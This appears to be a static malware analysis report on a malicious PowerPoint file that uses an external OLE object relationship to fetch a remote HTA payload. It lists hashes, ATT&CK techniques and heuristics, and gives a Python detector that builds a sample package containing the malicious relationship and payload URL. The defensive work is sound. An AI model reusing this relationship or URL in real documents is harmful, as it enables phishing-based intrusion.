Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ac31b548d58e8e9e…

MALICIOUS

Office (OOXML)

Size: 29.7 KB
Created: 2017-09-29 02:54:17 UTC
Authoring application: Microsoft Office PowerPoint 14.0000
First seen: 2017-11-20
MD5: db1a10cc813e4b3290cf88db2af0b736
SHA-1: 08cf2c855c36e83331cec201747010c69cbb280b
SHA-256: ac31b548d58e8e9e149d248a734a454b0697402486cadd44fcb51d0ecadc3849
Risk score: 102

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment; T1204.002 Malicious File

The sample carries an external OLE object relationship whose target is an HTA file hosted at http://97.64.28.21/web/02.hta. Because Office resolves such relationships through its OLE object update path rather than as a user-clicked hyperlink, opening the attachment can be enough for Office to fetch the remote HTA; the user is not relying on a visible link. Together with the PowerPoint authoring application and the ATT&CK techniques above, this is consistent with a phishing attachment used for initial access, with the remote HTA as the payload stage.

Heuristics (3)

  • MSHTML-style external object relationship  [critical, CVE-related]  OFFICE_MSHTML_EXTERNAL_OBJECT
    External relationship to http://97.64.28.21/web/02.hta: exploitable MSHTML/CAB/MHTML/HTA-style Office attack surface.
  • External OLE object relationship  [high]  OOXML_EXTERNAL_OLE_OBJECT
    The package contains an oleObject relationship (TargetMode="External") whose target is an HTTP(S) URL. Office resolves this through its OLE object update path rather than as a normal user-clicked hyperlink.
  • Embedded URL  [info]  EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://97.64.28.21/web/02.hta  (channel: document text, OOXML body / shared strings)
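The two relationship heuristics above reduce to one structural check on the OOXML package: walk every `.rels` part, find `Relationship` elements whose `Type` is the oleObject relationship, and report those with `TargetMode="External"` and an HTTP(S) target. The scanner below is an added example written for this page, not code from the report's analysis engine. It builds a constructed, minimal PPTX-like zip in memory whose slide relationships part points at the URL the report flagged, then scans it; the part names and relationship IDs in the sample are assumptions, not values recovered from the real file.

```python
"""Detect external oleObject relationships in an OOXML package.

Added example for this report; not the analysis engine's own code.
The sample package built by build_sample_pptx() is constructed here
and only mirrors the relationship the report describes.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
SLIDE_LAYOUT_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout"


def build_sample_pptx() -> bytes:
    """Constructed package: only the parts the scan needs (assumed part names)."""
    slide_rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{SLIDE_LAYOUT_TYPE}" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{OLE_TYPE}" Target="http://97.64.28.21/web/02.hta" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        z.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels)
    return buf.getvalue()


def find_external_ole_targets(package: bytes) -> list:
    """Return one record per oleObject relationship with TargetMode="External".

    Internal oleObject relationships (embedded objects shipped inside the zip)
    are ignored: the risk signal is the external target Office will resolve
    through its object update path without a user click on a visible link.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("Type") != OLE_TYPE:
                    continue
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                scheme = urlsplit(target).scheme.lower()
                path = urlsplit(target).path.lower()
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "target": target,
                    # HTTP(S) target: the OOXML_EXTERNAL_OLE_OBJECT condition.
                    "remote": scheme in ("http", "https"),
                    # HTA payload: the MSHTML/HTA-style condition.
                    "hta": path.endswith(".hta"),
                })
    return findings


def verdict(findings: list) -> str:
    """Map findings to the report's severity labels."""
    if any(f["remote"] and f["hta"] for f in findings):
        return "critical"
    if any(f["remote"] for f in findings):
        return "high"
    return "clean"


if __name__ == "__main__":
    hits = find_external_ole_targets(build_sample_pptx())
    for hit in hits:
        print(f"{hit['part']} {hit['id']} -> {hit['target']} (remote={hit['remote']}, hta={hit['hta']})")
    print("verdict:", verdict(hits))
```

To run it against a real sample, replace `build_sample_pptx()` with the bytes of the file. The check deliberately keys on the relationship `Type` and `TargetMode`, not on the URL string: a URL that only appears in slide text or shared strings is the EMBEDDED_URL informational signal, while the same URL as an external oleObject target is what Office will actually resolve.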